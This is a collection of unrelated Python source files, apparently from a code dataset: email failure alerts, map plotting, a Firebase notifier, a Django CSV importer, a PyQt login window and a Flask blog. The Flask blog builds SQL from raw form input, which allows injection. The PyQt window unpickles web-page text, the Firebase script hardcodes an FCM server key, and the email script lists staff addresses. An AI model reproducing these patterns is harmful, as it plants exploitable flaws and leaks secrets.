to the recipients: %s\" %(toaddr))\r\n elif M1 > 0 and M2 > 0:\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n file_list = ['shift_model_DFW.ilp','day_model_DFW.ilp']\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"LP Model Failed for DFW1 at day level and shift level\" \r\n body = \"Hello, \\nModel Failed at day level\"+str(M1)+\"times and shift level\"+str(M2)+\"times.\\nThanks\\nVenkatesh\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n for j in file_list:\r\n file_path = j\r\n attachment = open(file_path, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % j)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr)) \r\n cxn.close()\r\n logger.info(\"Vertica is Disconnected\")\r\nexcept Exception as e:\r\n print(\"Error Reported\")\r\n logger.error(\"Error in the code: \"+str(e))\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"Algorithm did not run for DFW1\" \r\n body = \"Hello, Algorithm failed for the following reason :\"+str(e)+\"\\nThanks\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n 
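# The three failure-notification branches differ only in subject, body and
# attachment list. A hypothetical consolidation using the same smtplib/email calls
# and addresses that appear in this script:
import smtplib
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def send_alert(subject, body, attachments=(),
               fromaddr='scsystems@chewy.com',
               toaddr='vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com',
               host='smtp.chewymail.com', port=25):
    msg = MIMEMultipart()
    msg['From'], msg['To'], msg['Subject'] = fromaddr, toaddr, subject
    msg.attach(MIMEText(body, 'plain'))
    for path in attachments:
        # Base64-encode each file as an octet-stream attachment.
        part = MIMEBase('application', 'octet-stream')
        with open(path, 'rb') as fh:
            part.set_payload(fh.read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition', 'attachment; filename= %s' % path)
        msg.attach(part)
    server = smtplib.SMTP(host, port)
    server.sendmail(fromaddr, toaddr.split(','), msg.as_string())
    server.quit()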
server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n logger.info(\"Vertica is Disconnected\")\r\n cxn.close()\r\nrh.close()\r\n", "sub_path": "ISO_DFW.py", "file_name": "ISO_DFW.py", "file_ext": "py", "file_size_in_byte": 98033, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 44, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 45, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 46, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 48, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 58, "usage_type": "call"}, {"api_name": "pyodbc.connect", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 484, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 501, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 501, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 523, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 536, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 556, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 578, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 597, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 653, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 681, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1222, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1322, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1338, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 1712, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1712, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 
1730, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 1758, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 1759, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 1760, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1760, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1770, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1796, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1804, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1809, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 1810, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1822, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1827, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 1831, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 1833, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 1833, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 1836, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1847, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1852, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 1856, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 1858, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 1858, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 1861, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1872, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1877, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 1881, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 1883, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 1883, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 1886, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1900, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1905, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 1906, "usage_type": "call"}]} +{"seq_id": "427984820", "text": "import matplotlib.pyplot as plt\nimport csv\nimport pandas as pd\nimport subprocess\nimport sys\nimport mplleaflet\n\nMVN_PATH = 'C:/Program Files/JetBrains/IntelliJ IDEA 2019.1.2/plugins/maven/lib/maven3/bin/mvn.cmd'\nmaps = ('helsinki',\n 'amsterdam',\n 'san_francisco',\n 'reykjavik',\n 'wellington',\n 'saint_petersburg',\n 'melbourne',\n 'quito',\n 'beijing',\n 'lausanne',\n 'sao_paulo',\n 'rome',\n 'berlin',\n 'osnabrueck')\n\n\ndef plotRoad(filename):\n print(\"Plotting road network\")\n df = pd.read_csv(filename, delimiter=\" \")\n df['lon'] = df['lon'].apply(\n lambda x: float(x.split()[0].replace(',', '.')))\n df['lat'] = df['lat'].apply(\n lambda x: float(x.split()[0].replace(',', '.')))\n\n for way, pos in df.groupby('way'):\n plt.plot(pos['lon'], pos['lat'], color='grey', lw=0.5)\n\n\ndef plotBuildings(path):\n print(\"Plotting buildings\")\n with open(path, 'r') as csv_file:\n csv.Dialect.delimiter = ' '\n reader = csv.reader(csv_file, delimiter=' ')\n next(reader) # skip first 
row\n for row in reader:\n cords_x = []\n cords_y = []\n if(row[0] == 'office'):\n for i in range(4, 2*(int(row[3]) + 1), 2):\n cords_x.append(float(row[i]))\n cords_y.append(float(row[i+1]))\n cords_x.append(cords_x[0])\n cords_y.append(cords_y[0])\n plt.plot(cords_x, cords_y, color='r')\n if(row[0] == 'home'):\n for i in range(4, 2*(int(row[3]) + 1), 2):\n cords_x.append(float(row[i]))\n cords_y.append(float(row[i+1]))\n cords_x.append(cords_x[0])\n cords_y.append(cords_y[0])\n plt.plot(cords_x, cords_y, color='g')\n\ndef createJar():\n try:\n proc = subprocess.Popen('mvn ' + ' clean package')\n except:\n proc = subprocess.Popen(MVN_PATH + ' clean package')\n finally:\n proc.wait()\n\n\ndef createCache(call):\n proc = subprocess.Popen(call)\n proc.wait()\n\n\ndef bulkSave():\n MIN_BUILDING_SIZE = 150\n MAX_BUILDING_SIZE = 999999\n createJar()\n\n for city in maps:\n plt.figure(figsize=(12.5, 8.5), dpi=300)\n call = \"java -Xmx12g -Xss1g -jar target/bonnmotion.jar OSMBuildingStats --in cities_10000/{}_cut_bbox.osm.pbf --out data/OSMBuildingStats/{} --min {} --max {}\".format(\n city, city, MIN_BUILDING_SIZE, MAX_BUILDING_SIZE)\n createCache(call)\n\n plotRoad('data/OSMBuildingStats/{}.street_network.dat'.format(city))\n plotBuildings('data/OSMBuildingStats/{}.csv'.format(city))\n plt.title(city)\n plt.savefig('data/OSMBuildingStats/{}_map.png'.format(city))\n plt.clf()\n\n\nif __name__ == \"__main__\":\n\n # Process all map\n # bulkSave()\n\n path_building = sys.argv[1]\n path_road = sys.argv[2]\n\n # path_building = 'data/BuildingCache/out.csv'\n # path_road = \"data/BuildingCache/out.street_network.dat\"\n\n plotRoad(path_road)\n plotBuildings(path_building)\n mng = plt.get_current_fig_manager()\n mng.frame.Maximize(True)\n plt.show()\n\n# mplleaflet.show(tiles=(\n# 'http://{s}.tile.openstreetmap.de/{z}/{x}/{y}.png',\n# 'Map data (c)
    OpenStreetMap contributors'\n# ))\n", "sub_path": "scripts/building_cache_polt.py", "file_name": "building_cache_polt.py", "file_ext": "py", "file_size_in_byte": 3396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "csv.Dialect", "line_number": 40, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 63, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 65, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 99, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.get_current_fig_manager", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}]} +{"seq_id": "227062489", "text": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport datetime\nimport json\nimport requests\n\nserver_key = 'AAAAsikYyb0:APA91bGwXYmYutp5dyUI74YNndwBgEFWfCmB4RxJdiPSHqxZ8Xa6fy_4MXKbPbTcbXoIdNMB5G0-CWXlT_fTzUUMPYcPIJ-TL7_UzPhFYSQW8pjJpUZIbvGuqxYKwiFQfq8jKFeUmTyi'\nserial = '123'\ndevice_token = ''\n\ndef send_notification(msg) :\n\theaders = {\n\t\t'Authorization': 'key= ' + server_key,\n\t\t'Content-Type': 'application/json',\n\t}\n\n\tdata = {\n\t\t'to': device_token,\n\t\t'notification': {\n\t\t\t'title': 'Inner car',\n\t\t\t'body': msg\n\t\t},\n\t}\n\n\tresponse = requests.post('https://fcm.googleapis.com/fcm/send', headers=headers, data=json.dumps(data))\n\tprint(response)\n\tprint(\"\")\n\tprint(\"\")\n\tprint(\"exit\")\n\nif __name__ == '__main__':\n\tcred = credentials.Certificate('capstone-liunx0-firebase-adminsdk-8ke8r-eca629c61b.json')\n\n\tfirebase_admin.initialize_app(cred, {\n\t\t'databaseURL': 'https://capstone-liunx0.firebaseio.com/'\n\t\t})\n\n\tref = db.reference(serial + '/Device')\n\tdevice_token = ref.get()\n\n\tprint(\"\")\n\tprint(\"\")\n\tprint(device_token)\n\tprint(\"\")\n\tprint(\"\")\n\n\tif(device_token != None) 
:\n\t\tsend_notification('baby')\n\n", "sub_path": "Python/FMNG.py", "file_name": "FMNG.py", "file_ext": "py", "file_size_in_byte": 1137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.post", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "firebase_admin.credentials.Certificate", "line_number": 33, "usage_type": "call"}, {"api_name": "firebase_admin.credentials", "line_number": 33, "usage_type": "name"}, {"api_name": "firebase_admin.initialize_app", "line_number": 35, "usage_type": "call"}, {"api_name": "firebase_admin.db.reference", "line_number": 39, "usage_type": "call"}, {"api_name": "firebase_admin.db", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "633152036", "text": "import csv\nimport datetime\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom squirrel.models import Chipmunk\n\ndef str_to_bool(x):\n if x.lower() == 'true':\n return True\n elif x.lower() == 'false':\n return False\n else:\n # evil ValueError that doesn't tell you what the wrong value was\n raise ValueError(\"Has to be True or False!\")\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('path')\n\n def handle(self, *args, **kwargs):\n path = kwargs['path']\n\n try:\n with open(path, encoding='utf-8') as fp:\n reader = csv.DictReader(fp)\n\n\n for item in reader:\n squirrel = Chipmunk.objects.filter(\n unique_squirrel_id=item['Unique Squirrel ID'])\n if squirrel.exists():\n continue\n squirrel=Chipmunk(\n longitude=item['X'],\n latitude=item['Y'],\n unique_squirrel_id=item['Unique Squirrel ID'],\n shift=item['Shift'],\n date=datetime.date(int(item['Date'][-4:]),int(item['Date'][:2]),int(item['Date'][2:4])), \n age=item['Age'],\n primary_fur_color=item['Primary Fur Color'],\n location=item['Location'],\n specific_location=item['Specific Location'],\n running=str_to_bool(item['Running']),\n chasing=str_to_bool(item['Chasing']),\n climbing=str_to_bool(item['Climbing']),\n eating=str_to_bool(item['Eating']),\n foraging=str_to_bool(item['Foraging']),\n other_activities=item['Other Activities'],\n kuks=str_to_bool(item['Kuks']),\n quaas=str_to_bool(item['Quaas']),\n moans=str_to_bool(item['Moans']),\n tail_flags=str_to_bool(item['Tail flags']),\n tail_twitches=str_to_bool(item['Tail twitches']),\n approaches=str_to_bool(item['Approaches']),\n indifferent=str_to_bool(item['Indifferent']),\n runs_from=str_to_bool(item['Runs from']),\n )\n\n squirrel.save()\n #print(f\"Squirrel {item['Unique Squirrel ID']} imported successfully!\")\n except csv.Error as e:\n print(f'there is something wrong with {reader.line_num}')\n", "sub_path": "squirrel/management/commands/import_data.py", "file_name": "import_data.py", "file_ext": "py", "file_size_in_byte": 2652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 17, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 26, "usage_type": "call"}, {"api_name": "squirrel.models", "line_number": 30, "usage_type": "name"}, {"api_name": "squirrel.models.Chipmunk.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "squirrel.models.Chipmunk.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "squirrel.models.Chipmunk", "line_number": 30, "usage_type": "name"}, {"api_name": 
"squirrel.models.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "squirrel.models", "line_number": 32, "usage_type": "name"}, {"api_name": "squirrel.models", "line_number": 34, "usage_type": "name"}, {"api_name": "squirrel.models.Chipmunk", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 39, "usage_type": "call"}, {"api_name": "squirrel.models.save", "line_number": 60, "usage_type": "call"}, {"api_name": "squirrel.models", "line_number": 60, "usage_type": "name"}, {"api_name": "csv.Error", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "120122565", "text": "from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QLabel, QGridLayout, QWidget, QApplication, QPushButton, QDialog\nfrom PyQt5.QtCore import QSize, pyqtSlot, QUrl\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nimport binascii\nimport codecs\nimport pickle\nimport httplib2\nimport fitAPI\n\nclass authWindow(QWebEngineView):\n def __init__(self, parentWindow, portNumber):\n super().__init__()\n self.title = 'Login'\n self.left = 50\n self.top = 50\n self.width = 500\n self.height = 800\n self.portNumber = portNumber\n self.initUI()\n self.parentWindow = parentWindow\n \n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.load(QUrl(\"http://localhost:\" + str(self.portNumber) + \"/?fake_user=Rowdy123456\"))\n self.show()\n\n self.loadFinished.connect(self.decodeCredentials)\n\n @pyqtSlot()\n def decodeCredentials(self):\n self.page().toPlainText(self.printBase64PickledCredentials)\n\n def printBase64PickledCredentials(self, result):\n try:\n encodedString = result.encode()\n pickledString = codecs.decode(encodedString, \"base64\")\n self.parentWindow.credentials = pickle.loads(pickledString)\n self.close()\n except (EOFError, pickle.UnpicklingError, binascii.Error):\n pass\n\n\ndef authenticate(parentWindow, portNumber):\n d = authWindow(parentWindow, portNumber)\n return d\n\n\n", "sub_path": "GoogleFitExporter/authWindow.py", "file_name": "authWindow.py", "file_ext": "py", "file_size_in_byte": 1595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "PyQt5.QtWebEngineWidgets.QWebEngineView", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QUrl", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 32, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.UnpicklingError", "line_number": 42, "usage_type": "attribute"}, {"api_name": "binascii.Error", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "435845294", "text": "from flask import Flask, render_template, request, jsonify, url_for, redirect\nfrom collections import defaultdict\nimport datetime\nimport pymysql\nfrom utils.t import timeTransform\n\ndb = pymysql.connect(host=\"localhost\",user=\"root\",passwd=\"root\",db=\"ZCMOL\",charset=\"utf8\")\ncursor = db.cursor()\n\napp = Flask(__name__)\n#主页\n@app.route('/')\n@app.route('/index')\ndef index():\n record_ip()\n sql_get_guestbook = \"select * from zc_guestbook order by gu_id desc limit 50\"\n cursor.execute(sql_get_guestbook) \n guestbook = cursor.fetchall()\n \n sql_get_links = \"select * from zc_links order by rand()\"\n 
cursor.execute(sql_get_links)\n links = cursor.fetchall()\n\n sql_get_play = \"select * from zc_anime\"\n cursor.execute(sql_get_play)\n play = cursor.fetchall()\n\n # 随机抽取一条数据\n #sql_get_music = \"select * from zc_music order by rand() limit 1\"\n sql_get_music = \"select * from zc_music where mu_id = 2\"\n cursor.execute(sql_get_music)\n bg_music = cursor.fetchone()\n \n sql_get_log = \"select * from zc_article order by ar_id desc limit 13\"\n cursor.execute(sql_get_log)\n log = cursor.fetchall()\n \n data = {\"guestbook\":guestbook,\"links\":links,\"play\":play,\"bg_music\":bg_music,\"log\":log}\n return render_template(\"index.html\", **data,timeFormat=timeTransform)\n\n#文章评论\n@app.route('/daily/')\ndef daily(article_id):\n\n #获取上下两篇\n\n sql_get_next = \"select ar_id from zc_article where ar_id > \"+str(article_id)+\" limit 1\"\n cursor.execute(sql_get_next)\n next_id = cursor.fetchone()\n sql_get_prev= \"select ar_id from zc_article where ar_id < \"+str(article_id)+\" order by ar_id desc limit 1\"\n cursor.execute(sql_get_prev)\n prev_id = cursor.fetchone()\n\n if next_id is not None:\n next_id = next_id[0]\n else:\n next_id = \"none\"\n if prev_id is not None:\n prev_id = prev_id[0]\n else:\n prev_id = \"none\"\n\n sql_get_content = \"select * from zc_article where ar_id = \"+str(article_id)\n cursor.execute(sql_get_content)\n content = cursor.fetchone()\n if content is None:\n return (\"文章已经删除了,哈哈\")\n \n comment_sql = \"select * from zc_comment where ar_id =\"+str(article_id)\n cursor.execute(comment_sql)\n comment = cursor.fetchall()\n \n # sort\n comment_dict = defaultdict(list)\n name_dict = dict()\n for c in comment:\n comment_dict[str(c[6])].append(c)\n name_dict[str(c[0])] = c[1]\n\n# print(comment_dict)\n\n# for root in comment_dict['None']:\n# print(root)\n# if str(root[0]) in comment_dict:\n# show(root[0])\n\n# def show(l):\n# for item in l:\n# print(item)\n# if str(item[0]) in comment_dict:\n# show(comment_dict[str(item[0])\n \n\n data = {\"content\":content,\"comment\":comment_dict,\"next_id\":next_id,\"prev_id\":prev_id, \"names\": name_dict}\n return render_template(\"daily.html\",**data)\n\n\n@app.route('/daily/comment',methods=['POST'])\ndef daily_comment():\n nickname = request.form[\"comment-nickname\"]\n if nickname == \"早茶月光\":\n return \"不能使用这个名字哟\"\n say = request.form[\"comment-say\"] \n article_id = request.form[\"article-reply-id\"]\n ip = request.headers['X-Forwarded-For']\n t = datetime.datetime.now()\n \n #判断时间\n check_time_sql = \"select * from zc_comment where co_ip='\"+ip+\"' and timestampdiff(SECOND,co_time,'\"+str(t)+\"') < 20\"\n check_time = cursor.execute(check_time_sql) \n if check_time > 0:\n return \"两次留言时间间隔要大于20秒\"\n\n has_reply = True\n reply_id = 1\n if 'reply-id' in request.form and request.form['reply-id']:\n reply_id = request.form['reply-id'] \n else:\n has_reply = False\n sql_comment = \"\"\n if has_reply:\n sql_comment = \"insert into zc_comment(co_name,co_content,co_time,co_ip,ar_id,co_replay_id) values('\"+nickname+\"','\"+say+\"','\"+str(t)+\"','\"+ip+\"','\"+article_id+\"','\"+reply_id+\"')\"\n else:\n sql_comment = \"insert into zc_comment(co_name,co_content,co_time,co_ip,ar_id) values('\"+nickname+\"','\"+say+\"','\"+str(t)+\"','\"+ip+\"','\"+article_id+\"')\"\n #print(nickname,say,article_id,ip,t,reply_id)\n #print(sql_comment)\n cursor.execute(sql_comment)\n db.commit() \n return redirect(url_for(\"daily\", article_id=article_id))\n\n\n \n\n \n\n\n\n#获取留言 \n@app.route('/guestbook',methods=['POST'])\ndef guestbook():\n nickname 
= request.form[\"nickname\"]\n say = request.form[\"say\"]\n if len(nickname.strip())== 0 or len(say.strip())==0 :\n return \"nickname or say is null\"\n ip = request.headers['X-Forwarded-For']\n time = datetime.datetime.now() \n \n #say time\n check_input_time_sql = \"select * from zc_guestbook where gu_ip ='\"+ip+\"' and timestampdiff(SECOND,gu_time,'\"+str(time)+\"')<20\"\n check_time = cursor.execute(check_input_time_sql) \n if check_time > 0:\n return \"showtip\"\n\n sql_insert = \"insert into zc_guestbook(gu_nickname,gu_say,gu_myreplay,gu_time,gu_ip) values('\"+nickname+\"','\"+say+\"','','\"+str(time)+\"','\"+ip+\"')\"\n cursor.execute(sql_insert)\n db.commit()\n\n sql_get = \"select * from zc_guestbook order by gu_id desc\"\n cursor.execute(sql_get)\n say_all = cursor.fetchall() \n \n data = {'list': say_all} \n\n return jsonify(data)\n \n\n\ndef record_ip():\n ip = request.headers['X-Forwarded-For'] \n t = datetime.datetime.now()\n sql_exist = \"select * from zc_allip where ip_ip='\"+ip+\"' limit 1\" \n exist = cursor.execute(sql_exist)\n if exist == 0:\n sql_insert = \"insert into zc_allip(ip_ip,ip_time) values('\"+ip+\"','\"+str(t)+\"')\"\n cursor.execute(sql_insert)\n sql_add = \"update zc_home set ho_liulanshu = ho_liulanshu+1 where ho_id = 1\"\n cursor.execute(sql_add) \n else:\n sql = \"select * from zc_allip where ip_ip='\"+ip+\"' and timestampdiff(SECOND,ip_time,'\"+str(t)+\"')>300\"\n is_add = cursor.execute(sql)\n if is_add > 0:\n sql_add = \"update zc_home set ho_liulanshu = ho_liulanshu+1 where ho_id = 1\"\n cursor.execute(sql_add) \n sql_update = \"update zc_allip set ip_time='\"+str(t)+\"' where ip_ip='\"+ip+\"'\" \n cursor.execute(sql_update)\n db.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n #app.run(port=5000,debug=True)\n app.run(port=5000)\n", "sub_path": "ZCMOL/zcmol/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 6400, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymysql.connect", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.t.timeTransform", "line_number": 39, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 104, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 117, "usage_type": "attribute"}, {"api_name": 
